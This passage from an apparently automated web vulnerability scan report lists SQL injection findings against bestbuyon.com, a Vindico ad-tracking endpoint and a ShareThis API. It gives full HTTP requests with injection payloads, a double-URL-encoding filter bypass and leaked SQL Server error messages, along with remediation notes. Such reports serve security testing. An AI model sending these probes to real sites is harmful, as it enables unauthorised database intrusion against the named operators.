160;\\ngoogle_ad_height = 600;\\n//-->\\n<\/scr\" + \"ipt>\\n<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"\\nsrc=\\\"http://pagead2.googlesyndication.com/pagead/show_ads.js\\\">\\n<\/scr\" + \"ipt><\/body>\\n<\/html>\";\n var targetFrame = fw_scope.getElementById(\"_fw_frame_160x600slot\");
...[SNIP]...
1.4. http://bestbuyon.com/listing/all [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bestbuyon.com
Path:   /listing/all

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /listing/all?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: bestbuyon.com
Proxy-Connection: keep-alive
Referer: http://bestbuyon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c56b3975764a4c1c23c3ba51229ba19=4db3cf7b358a53406884c4c8c1251271; has_js=1; __utmz=201133757.1300542418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-898677016-1300542417918; __utma=201133757.995275835.1300542418.1300542418.1300542418.1; __utmc=201133757; __utmb=201133757.3.8.1300542417929

Response 1

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 14:26:31 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 19 Mar 2011 14:26:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 92802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-7996444b6a25560149a05c472d868f27" value="form-7996444b6a25560149a05c472d868f27" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>


</div></form>
</div>
           </div>
       </div>
       <div id="core" class="content-container">
           <div class="content">
                               <div class="column-a column">
                   <div class="breadcrumb"> <span class="breadcrumb-separator">&lt;</span> <a href="/">Home</a></div>                    
                                                                                                                                                               <div id="listing-page"><div id="nav" class="cufon-font-tabs"><a href="#" title="block_1" class="cufon-font-1"><span class="sw-hidden">BROWSE ALL</span><img src="/sites/default/files/signwriter/BROWSEALL-a0ee2a1818af0368f29b0de4ce1e2ff6-signwriter.png" alt="BROWSE ALL" title="" width="123" height="19" class="signwriter" /></a><a href="#" title="block_2" class="cufon-font-1"><span class="sw-hidden">VIDEOS</span><img src="/sites/default/files/signwriter/VIDEOS-e295b4d55446cf7af3134ce6d21ae2fb-signwriter.png" alt="VIDEOS" title="" width="75" height="19" class="signwriter" /></a><a href="#" title="block_3" class="cufon-font-1"><span class="sw-hidden">ARTICLES</span><img src="/sites/default/files/signwriter/ARTICLES-254cac6288124dab55b0af8f9040255e-signwriter.png" alt="ARTICLES" title="" width="96" height="19" class="signwriter" /></a><a href="#" title="block_4" class="cufon-font-1"><span class="sw-hidden">SLIDESHOWS</span><img src="/sites/default/files/signwriter/SLIDESHOWS-c3921868bf8617dc1e7069ed79e20569-signwriter.png" alt="SLIDESHOWS" title="" width="127" height="19" class="signwriter" /></a><div class="clear"></div> </div><div class="tab-panel"><div class="hiddencontent" id=block_1><div class="filters"><form action="/listing/all?1&#039;%20and%201%3d1--%20=1" accept-charset="UTF-8" method="post" id="bbyon-cm-listing-page-topic-filter-form">
<div><div class="form-item" id="edit-bbyon-cm-listing-topic-wrapper">
<label for="edit-bbyon-cm-li
...[SNIP]...

Request 2

GET /listing/all?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: bestbuyon.com
Proxy-Connection: keep-alive
Referer: http://bestbuyon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c56b3975764a4c1c23c3ba51229ba19=4db3cf7b358a53406884c4c8c1251271; has_js=1; __utmz=201133757.1300542418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-898677016-1300542417918; __utma=201133757.995275835.1300542418.1300542418.1300542418.1; __utmc=201133757; __utmb=201133757.3.8.1300542417929

Response 2

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 14:26:35 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 19 Mar 2011 14:26:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 92784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<input type="hidden" name="form_build_id" id="form-451d6576473cdbb25565666361684354" value="form-451d6576473cdbb25565666361684354" />
<input type="hidden" name="form_id" id="edit-search-theme-form" value="search_theme_form" />
</div>


</div></form>
</div>
           </div>
       </div>
       <div id="core" class="content-container">
           <div class="content">
                               <div class="column-a column">
                   <div class="breadcrumb"> <span class="breadcrumb-separator">&lt;</span> <a href="/">Home</a></div>                    
                                                                                                                                                               <div id="listing-page"><div id="nav" class="cufon-font-tabs"><a href="#" title="block_1" class="cufon-font-1"><span class="sw-hidden">BROWSE ALL</span><img src="/sites/default/files/signwriter/BROWSEALL-a0ee2a1818af0368f29b0de4ce1e2ff6-signwriter.png" alt="BROWSE ALL" title="" width="123" height="19" class="signwriter" /></a><a href="#" title="block_2" class="cufon-font-1"><span class="sw-hidden">VIDEOS</span><img src="/sites/default/files/signwriter/VIDEOS-e295b4d55446cf7af3134ce6d21ae2fb-signwriter.png" alt="VIDEOS" title="" width="75" height="19" class="signwriter" /></a><a href="#" title="block_3" class="cufon-font-1"><span class="sw-hidden">ARTICLES</span><img src="/sites/default/files/signwriter/ARTICLES-254cac6288124dab55b0af8f9040255e-signwriter.png" alt="ARTICLES" title="" width="96" height="19" class="signwriter" /></a><a href="#" title="block_4" class="cufon-font-1"><span class="sw-hidden">SLIDESHOWS</span><img src="/sites/default/files/signwriter/SLIDESHOWS-c3921868bf8617dc1e7069ed79e20569-signwriter.png" alt="SLIDESHOWS" title="" width="127" height="19" class="signwriter" /></a><div class="clear"></div> </div><div class="tab-panel"><div class="hiddencontent" id=block_1><div class="filters"><form action="/listing/all?1&#039;%20and%201%3d2--%20=1" accept-charset="UTF-8" method="post" id="bbyon-cm-listing-page-topic-filter-form">
<div><div class="form-item" id="edit-bbyon-cm-listing-topic-wrapper">
<label for="edit-bbyon-cm-li
...[SNIP]...
1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:29 GMT
Expires: Sat, 19 Mar 2011 14:46:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQDSRQRT=BCDOKCBCNDBPILMNGEFOIGMP; path=/
X-Powered-By: ASP.NET
Content-Length: 792
Connection: keep-alive

<br>Error Description:Incorrect syntax near the keyword 'Default'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutlet
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:32 GMT
Expires: Sat, 19 Mar 2011 14:46:32 GMT
Location: /Tracking/dot.gif
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQACQTSST=GNHBFPACFEHHLBBCJKANAEML; path=/
X-Powered-By: ASP.NET
Content-Length: 138
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Tracking/dot.gif">here</a>.</body>
1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:23 GMT
Expires: Sat, 19 Mar 2011 14:46:23 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSTQTRT=KMCGOIBCMEGIMJAGEGAADBCD; path=/
X-Powered-By: ASP.NET
Content-Length: 1227
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'undefined'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287
...[SNIP]...

Request 2

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:46:29 GMT
Expires: Sat, 19 Mar 2011 14:46:29 GMT
Location: /Tracking/dot.gif
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQACQTSST=JLHBFPACAHBAPPFFDELMMAJA; path=/
X-Powered-By: ASP.NET
Content-Length: 138
Connection: keep-alive

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Tracking/dot.gif">here</a>.</body>
1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the adRotationId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302%2527&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:19 GMT
Expires: Sat, 19 Mar 2011 14:45:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCTTRTQ=ENFOCABCPIBFDFIEDMGAFMCP; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287, @adrot
...[SNIP]...
1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the bannerCreativeAdModuleId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505%2527 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:28 GMT
Expires: Sat, 19 Mar 2011 14:45:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQDSRQRT=LIAOKCBCFKIOFENLHAINDNAC; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505%27, @campaignId = 6386, @syndicationOutletId = 48287, @ad
...[SNIP]...
1.9. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the campaignId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287&campaignId=6386%2527&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:16 GMT
Expires: Sat, 19 Mar 2011 14:45:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTSTQQQ=IOPLLDBCJELPBBDJOMLNNGIO; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386%27, @syndicationOutletId = 48287, @ad
...[SNIP]...
1.10. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the siteId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936%2527&syndicationOutletId=48287&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:44:59 GMT
Expires: Sat, 19 Mar 2011 14:44:59 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSTQTRT=AKPFOIBCFKAOGEMHOBCIEBKM; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936%27, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287, @ad
...[SNIP]...
1.11. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The syndicationOutletId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the syndicationOutletId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the syndicationOutletId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1936&syndicationOutletId=48287%2527&campaignId=6386&adRotationId=15302&bannerCreativeAdModuleId=21505 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21505&siteId=1936&syndicationOutletId=48287&campaignId=6386&adRotationId=15302
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 19 Mar 2011 14:45:10 GMT
Expires: Sat, 19 Mar 2011 14:45:11 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSRDCRQC=LGINKEACKNDHFBAHIKMGKIHG; path=/
X-Powered-By: ASP.NET
Content-Length: 1221
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1936, @bannerCreativeAdModuleId = 21505, @campaignId = 6386, @syndicationOutletId = 48287%27, @ad
...[SNIP]...
1.12. http://wd.sharethis.com/api/getApi.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=/1'null HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 1

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 112

getPubGA_onSuccess({"status":"FAILURE","statusMessage":"Failed to load publisher domains","statusNumber":null});

Request 2

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=/1''null HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
